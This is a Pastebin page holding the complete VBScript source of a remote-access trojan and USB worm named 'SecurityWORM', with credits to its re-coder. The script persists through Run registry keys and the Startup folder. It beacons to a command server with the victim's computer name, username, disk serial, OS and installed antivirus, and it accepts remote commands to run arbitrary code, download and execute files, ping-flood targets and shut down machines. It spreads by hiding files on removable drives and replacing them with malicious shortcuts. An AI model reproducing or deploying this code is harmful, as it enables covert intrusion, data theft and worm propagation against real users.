API tools faq
paste
Advertisement
SecurityNajaf

SecurityWORM

SecurityNajaf
Jan 15th, 2014
409
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.83 KB | None | 0 0
raw download clone embed print report
  1. on error resume next
  2.  
  3. '#################################################################
  4.  
  5. '<[ Recoder : Security.Najaf (c) skype : Security.Najaf ]>
  6.  
  7. '<[ Credits : NjQ8 and Mr.Hacker ]>
  8.  
  9. '<[ Thanks For : JoHn.Dz ]>
  10.  
  11. '#################################################################
  12.  
  13. ' \\ Configuration ~
  14. '-----------------------------------------
  15. dim shell
  16. set shell = WScript.CreateObject("WSCRIPT.SHELL")
  17. dim fs
  18. set fs = WScript.CreateObject("Scripting.filesystemobject")
  19. dim installname
  20. installname = "trojan.vbs"
  21. dim dir
  22. dir = "Temp"
  23. path = shell.ExpandEnvironmentStrings("%" & dir & "%") & "\"
  24. dim spl
  25. spl="|SE-NAJAF|"
  26. dim http
  27. set http = CreateObject("MICROSOFT.XMLHTTP")
  28. dim host
  29. host = "127.0.0.1"
  30. dim port
  31. port = "1144"
  32. dim name
  33. name = "Sec_User"
  34. dim startup
  35. startup = shell.specialfolders ("startup") & "\"
  36. dim response
  37. dim i
  38. i = 0
  39. dim y
  40. y = 0
  41. dim oneonce
  42. dim cmd
  43. dim usb
  44. usb= shell.regread("HKCU\Windowsshell")
  45. if usb="" then
  46. if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(installname) then
  47. usb="TRUE"
  48. shell.regwrite "HKCU\Windowsshell", usb, "REG_SZ"
  49. else
  50. usb="FALSE"
  51. shell.regwrite "HKCU\Windowsshell", usb, "REG_SZ"
  52.  
  53. end if
  54. end if
  55. Err.Clear
  56. ' \\ Settings ~
  57. '-----------------------------------------
  58. install
  59. xinstall
  60. while true
  61. cmd = ""
  62. cmd = Send ("READY","")
  63. response = split(cmd,spl)
  64. select case response(0)
  65. Case "uninstall"
  66. uninstall
  67. case "RE"
  68. shell.run WScript.SCRIPTFULLNAME ,7
  69. WScript.Quit
  70. case "download"
  71. download response(1),path & response(2)
  72. case "update"
  73. oneonce.close
  74. set oneonce = fs.opentextfile (path & installname ,2, false)
  75. oneonce.write response(1)
  76. oneonce.close
  77. shell.run "wscript.exe //B " & chr(34) & path & installname & chr(34),7
  78. wscript.quit
  79. case "execute"
  80. execute response(1)
  81. case "cmd"
  82. shell.run "%comspec%" & response(1),7
  83. case "Attack"
  84. shell.run "%comspec%" & " /c ping " & response(1) & " -l " & response(2) & " -t",7
  85. case "ourl"
  86. shell.run "%comspec% " & " /c start " & response(1),7
  87. case "close"
  88. WScript.Quit
  89. case "shutdown"
  90. shell.run "%comspec%" & " /c shutdown /s /t " & response(1),7
  91. case "restart"
  92. shell.run "%comspec%" & " /c shutdown /r /t " & response(1),7
  93. case "logoff"
  94. shell.run "%comspec%" & " /c shutdown /l /t " & response(1),7
  95. end select
  96. WSCRIPT.SLEEP 2000
  97. i = i + 1
  98. if i> 2 then
  99. i=0
  100. xinstall
  101. end if
  102.  
  103. wend
  104. ' \\ Sub and Function ~
  105. '-----------------------------------------
  106. function Send(cmd,data)
  107. Send = ""
  108. http.open "POST","http://" & host & ":" & port &"/" & cmd, false
  109. http.setRequestHeader "User-Agent:", userinfo
  110. http.send data
  111. Send = http.responseText
  112. end function
  113. function userinfo
  114. on error resume next
  115. if userinfo = "" then
  116. x = "XDZX"
  117. userinfo = x & " startinfo" & spl & name & hwid & spl & OS & spl & computer & spl & username &spl & security & spl & usb & spl & "1.2" &spl & x
  118. end if
  119. end Function
  120. function computer
  121. computer = shell.expandenvironmentstrings("%computername%")
  122. end function
  123. function username
  124. username = shell.expandenvironmentstrings("%username%")
  125. end function
  126. function hwid
  127. on error resume next
  128. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  129. set disks = root.execquery ("select * from win32_logicaldisk")
  130. for each disk in disks
  131. if disk.volumeserialnumber <> "" then
  132. hwid = disk.volumeserialnumber
  133. exit for
  134. end if
  135. next
  136. End function
  137. function security
  138. on error resume next
  139. security = ""
  140. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  141. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  142. for each objitem in colitems
  143. versionstr = split (objitem.version,".")
  144. next
  145. versionstr = split (colitems.version,".")
  146. osversion = versionstr (0) & "."
  147. for x = 1 to ubound (versionstr)
  148. osversion = osversion & versionstr (i)
  149. next
  150. osversion = eval (osversion)
  151. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  152. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  153. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  154. for each objantivirus in colantivirus
  155. security = security & objantivirus.displayname & " ."
  156. next
  157. if security = "" then security = "Not Found"
  158. end function
  159. Function OS
  160. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  161. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  162. For Each aaa in aa
  163. s= aaa.Caption
  164. next
  165. OS = s
  166. End Function
  167. sub xinstall
  168. On Error resume next
  169. for each xx in fs.Drives
  170. if xx.isready then
  171. if xx.FreeSpace >0 then
  172. if xx.drivetype=1 then
  173. if fs.fileexists(xx.path & "\" & installname) then
  174. fs.getfile(xx.path & "\" & installname).Attributes=0
  175. end if
  176. fs.copyfile path & installname , xx.path & "\" & installname,true
  177. For Each x In fs.GetFolder( xx.path & "\" ).Files
  178. wscript.sleep 1
  179. if instr(x.name,".") then
  180. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  181. x.Attributes = 2+4
  182. if ucase(x.name) <> ucase(installname) then
  183. With shell.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  184. .TargetPath = "cmd.exe"
  185. .WorkingDirectory = ""
  186. .WindowStyle = 7
  187. .Arguments = "/c start " & Replace(installname," ", ChrW(34) _
  188. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  189. .IconLocation = shell.regread("HKLM\SOFTWARE\Classes\" & shell.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  190. if instr( .iconlocation,",")=0 then
  191. .iconlocation = .iconlocation &",0"
  192. end if
  193. .Save()
  194. end with
  195. end if
  196. end if
  197. end if
  198. Next
  199. end if
  200. end if
  201. end if
  202. next
  203. Err.Clear
  204. end sub
  205. sub install ()
  206. on error resume Next
  207. shell.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  208. shell.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  209. fs.copyfile wscript.scriptfullname,installdir & path,true
  210. fs.copyfile wscript.scriptfullname,startup & installname ,true
  211. end sub
  212. sub uninstall
  213. on error resume next
  214. dim filename
  215. shell.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  216. shell.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  217. fs.deletefile startup & installname ,true
  218. fs.deletefile wscript.scriptfullname ,true
  219. for each drive In fs.drives
  220. if drive.isready = true then
  221. if drive.freespace > 0 then
  222. if drive.drivetype = 1 then
  223. for each file in fs.getfolder ( drive.path & "\").files
  224. on error resume next
  225. if instr (file.name,".") then
  226. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  227. file.attributes = 0
  228. if ucase (file.name) <> ucase (installname) then
  229. filename = split(file.name,".")
  230. fs.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  231. else
  232. fs.deletefile (drive.path & "\" & file.name)
  233. end if
  234. end if
  235. end if
  236. next
  237. end if
  238. end if
  239. end if
  240. next
  241. wscript.quit
  242. end sub
  243. sub download (fileurl,filename)
  244. strlink = fileurl
  245. strsaveto = installdir & filename
  246. set objhttpdownload = createobject("msxml2.xmlhttp" )
  247. objhttpdownload.open "get", strlink, false
  248. objhttpdownload.send
  249. set objfsodownload = createobject ("scripting.filesystemobject")
  250. if objfsodownload.fileexists (strsaveto) then
  251. objfsodownload.deletefile (strsaveto)
  252. end if
  253. if objhttpdownload.status = 200 then
  254. dim objstreamdownload
  255. set objstreamdownload = createobject("adodb.stream")
  256. with objstreamdownload
  257. .type = 1
  258. .open
  259. .write objhttpdownload.responsebody
  260. .savetofile strsaveto
  261. .close
  262. end with
  263. set objstreamdownload = nothing
  264. end if
  265. if objfsodownload.fileexists(strsaveto) then
  266. shell.run objfsodownload.getfile (strsaveto).shortpath
  267. end if
  268. end sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!